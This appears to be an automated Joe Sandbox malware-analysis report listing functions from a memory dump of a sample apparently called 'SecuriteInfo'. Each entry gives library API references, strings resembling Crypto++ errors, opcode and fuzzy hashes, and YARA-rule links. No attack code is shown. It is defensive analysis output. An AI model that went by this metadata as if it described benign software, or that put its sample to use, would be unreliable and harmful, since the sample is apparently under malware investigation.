Part of subcall function 6CF008B2: __fltout2.LIBCMT ref: 6CF008DD

__cftog_l.LIBCMT ref: 6CF00AAC
__cftoe_l.LIBCMT ref: 6CF00ADE

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 14b3bb4766f209240e65b3b9249a88a2b74cabdcbb1b6596e0aa1b0ca7c21370
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 5A117E3310018ABBCF165E84DC22CDE3F22BB19758B598515FE2859530C376C6B1BB81

Function 6CEF8970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6CEF8A84
_memmove.LIBCMT ref: 6CEF8AA0

Strings

EncodingParameters, xrefs: 6CEF8A41

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _memmove_memset
String ID: EncodingParameters
API String ID: 3555123492-55378216
Opcode ID: 76b4cd565bda1ef09e5b4562de235afcc81a4d218ffaf473de44a8cf6679ea8a
Instruction ID: 51822a327266fcfdd02883c604866482697b0365b50f4b09dd45ae1679ad5d47
Opcode Fuzzy Hash: 76b4cd565bda1ef09e5b4562de235afcc81a4d218ffaf473de44a8cf6679ea8a
Instruction Fuzzy Hash: E36102B42083419FC344CF69C880A1AFBE9AFC9754F148A1EF59987391D770E945CBA2

Function 6CE9F190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 6CE94760: __CxxThrowException@8.LIBCMT ref: 6CE947F9

Part of subcall function 6CEC8D80: _malloc.LIBCMT ref: 6CEC8D8A
Part of subcall function 6CEC8D80: _malloc.LIBCMT ref: 6CEC8DAF

_memcpy_s.LIBCMT ref: 6CE9F282
_memset.LIBCMT ref: 6CE9F293

Strings

@, xrefs: 6CE9F2DE

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _malloc$Exception@8Throw_memcpy_s_memset
String ID: @
API String ID: 3081897325-2766056989
Opcode ID: 9231aceb7923f59ed869d409939e40a7a923d5865e9989fbb150ba3a49471cc6
Instruction ID: 89c2e8219f98124c7707c5a3d19a1a38389e0b94e1ae08005b8bd121ff5d64e2
Opcode Fuzzy Hash: 9231aceb7923f59ed869d409939e40a7a923d5865e9989fbb150ba3a49471cc6
Instruction Fuzzy Hash: D351BE71900248DFDB20CFA4C981BDEBBB4BF45308F20819DE85967781DB756A49CF92

Function 6CE94100 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE94175
_memmove.LIBCMT ref: 6CE941C6

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

Strings

string too long, xrefs: 6CE94170

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 122cc310d183683d061edb53f32501ac7ceb8e07ce8c30f22deec2da834e0756
Instruction ID: c6a2cfc67be6886dc1586c9d4f20f729de230060eefa4dcd3f4cf46024e23e45
Opcode Fuzzy Hash: 122cc310d183683d061edb53f32501ac7ceb8e07ce8c30f22deec2da834e0756
Instruction Fuzzy Hash: 1A31B3333156105BD3249E5DEC80A5AF7F9EBA6768B300A2FE4A1CBF40C7619C4497A2

Function 6CECC350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CECC39B

Strings

gfff, xrefs: 6CECC3A3
gfff, xrefs: 6CECC3F7

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw
String ID: gfff$gfff
API String ID: 2005118841-3084402119
Opcode ID: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
Instruction ID: b30214515156b9d4762adb68db9ff9a9f596ca3f68d1d57635ff2332935f28c1
Opcode Fuzzy Hash: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
Instruction Fuzzy Hash: 12314371A0420DAFD714CF98D980EEEB779FB84718F54811CE92597784D730BA09CB92

Function 6CE918C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

__CxxThrowException@8.LIBCMT ref: 6CE9194F

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

std::exception::exception.LIBCMT ref: 6CE9198E

Part of subcall function 6CEF95C1: std::exception::operator=.LIBCMT ref: 6CEF95DA

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE94067
Part of subcall function 6CE94010: _memmove.LIBCMT ref: 6CE940C8

Strings

Clone() is not implemented yet., xrefs: 6CE918ED

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
String ID: Clone() is not implemented yet.
API String ID: 2192554526-226299721
Opcode ID: df01af26b834f52c0907929de4cacfcb640a416a04802cca0ded7097aff29a6f
Instruction ID: c5739f8f995e16d0ed35005e30c55d5faacc994f4b3633da103cc9ed51512461
Opcode Fuzzy Hash: df01af26b834f52c0907929de4cacfcb640a416a04802cca0ded7097aff29a6f
Instruction Fuzzy Hash: AD3162B1C04248AFCB14CF98D840BEEFBB8FB09714F20462EE421A7B90D7759608CB90

Function 6CEC5560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

__CxxThrowException@8.LIBCMT ref: 6CEC5657

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Strings

InputBuffer, xrefs: 6CEC55BF
StringStore: missing InputBuffer argument, xrefs: 6CEC55E0

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: InputBuffer$StringStore: missing InputBuffer argument
API String ID: 3718517217-2380213735
Opcode ID: b49e5b1e8c176cd07d035340b20f436806dd76f8021af583cf91aa54ed517d03
Instruction ID: fdee1713448a0f5df6661970b479d3d2964ebef23df14a86e2eb2b343bdb1032
Opcode Fuzzy Hash: b49e5b1e8c176cd07d035340b20f436806dd76f8021af583cf91aa54ed517d03
Instruction Fuzzy Hash: D14127B16083809FC320CF19C590A9BFBF4BB99718F548A1EF5E987790DB759908CB52

Function 6CE91EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

__CxxThrowException@8.LIBCMT ref: 6CE91F36

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

std::exception::exception.LIBCMT ref: 6CE91F6E

Part of subcall function 6CEF95C1: std::exception::operator=.LIBCMT ref: 6CEF95DA

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE94067
Part of subcall function 6CE94010: _memmove.LIBCMT ref: 6CE940C8

Strings

CryptoMaterial: this object does not support precomputation, xrefs: 6CE91ED4

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
String ID: CryptoMaterial: this object does not support precomputation
API String ID: 2192554526-3625584042
Opcode ID: 96d0121d980e61ccb49b65f43003625175857fec60f1ba369e1bdfa3d5512bb6
Instruction ID: e91a054e26a4e9c963313a66d9238ede8bac796ea4605c5fd72ab69f9b2328de
Opcode Fuzzy Hash: 96d0121d980e61ccb49b65f43003625175857fec60f1ba369e1bdfa3d5512bb6
Instruction Fuzzy Hash: B53141B1904248AFCB14CF98D840BEEFBB8FB09714F20866EE42597B90D7759908CB90

Function 6CEA3317 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CEA3327

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

std::_Xinvalid_argument.LIBCPMT ref: 6CEA336B

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

Strings

vector<T> too long, xrefs: 6CEA3366

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 1735018483-3788999226
Opcode ID: 4f1d67ef4cb28da25ef6d68d5cb3706bb78248059200d5307e9fb6a62df5d3bb
Instruction ID: d1e1034612e287883164071e6a04c16eac9c46b2f5f38f4b4063f3ddd376f345
Opcode Fuzzy Hash: 4f1d67ef4cb28da25ef6d68d5cb3706bb78248059200d5307e9fb6a62df5d3bb
Instruction Fuzzy Hash: 3A31D875B04115AFCB24DF98D880B9AB7B1EB45718F204729E9299FB80DB31ED05CBD1

Function 6CEB5810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEB584D

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

VariantClear.OLEAUT32(00000000), ref: 6CEB5899

Strings

vector<T> too long, xrefs: 6CEB5848

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 2677079660-3788999226
Opcode ID: d7cd5760444a4451637df91f371df924dd7f35d4c4f4d456329a4c9d6af95581
Instruction ID: c092bfe1b31a2b1c042855b7fba0ad44e49766ac31ddbe0a5967a40afc33f707
Opcode Fuzzy Hash: d7cd5760444a4451637df91f371df924dd7f35d4c4f4d456329a4c9d6af95581
Instruction Fuzzy Hash: 6C21B372A016059FD710CF68D980A6EB7F5FF84328F244A3EE465E7B40DB35A9008B90

Function 6CEA5750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEA576B

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

std::_Xinvalid_argument.LIBCPMT ref: 6CEA5782

Strings

string too long, xrefs: 6CEA5766, 6CEA577D

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 559298ea2276379374c1798689e634910ceaf16abf03b71e1dff975bab27e919
Instruction ID: 14bad461f155da1ca8054b6d25c9b0e0b97f0967c6251113f7459c11446d4909
Opcode Fuzzy Hash: 559298ea2276379374c1798689e634910ceaf16abf03b71e1dff975bab27e919
Instruction Fuzzy Hash: A1118733305B109FD321DE9CA880AAAF7F9AF95724B70061FF552DBF40C761984587A1

Function 6CE946B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE946C4

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

_memmove.LIBCMT ref: 6CE9470B

Strings

string too long, xrefs: 6CE946BF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 1785806476-2556327735
Opcode ID: 2660d7b76ee8726f2140005ffd4bb6cad563e412863a6491fccf37de0201ea23
Instruction ID: 9b3e36f1c56986e995b8a5880d2ccf72fd043f79bd0e9f0708ab95e03adb1139
Opcode Fuzzy Hash: 2660d7b76ee8726f2140005ffd4bb6cad563e412863a6491fccf37de0201ea23
Instruction Fuzzy Hash: DE11BC721153145FE7209D78A8D0A6AB7B9AF5231CF340B2FD4A787B82D771A4488752

Function 6CEC4D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

__CxxThrowException@8.LIBCMT ref: 6CEC4E00

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Strings

OutputBuffer, xrefs: 6CEC4D77
ArraySink: missing OutputBuffer argument, xrefs: 6CEC4D91

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
API String ID: 3718517217-3781944848
Opcode ID: a41bf05127d56727dd917a74cfccc61d3fd82d6b60dffed82a2de01ab785ff66
Instruction ID: 9923f89c79d34337e0078e78c8e4ff60de45929310089acf34c5a7befd2747c7
Opcode Fuzzy Hash: a41bf05127d56727dd917a74cfccc61d3fd82d6b60dffed82a2de01ab785ff66
Instruction Fuzzy Hash: CE3114B151C380AFC310CF69C490A9ABBF4BB99714F508E1EF5A587B50DB75D908CB92

Function 6CEA0150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

__CxxThrowException@8.LIBCMT ref: 6CEA0201

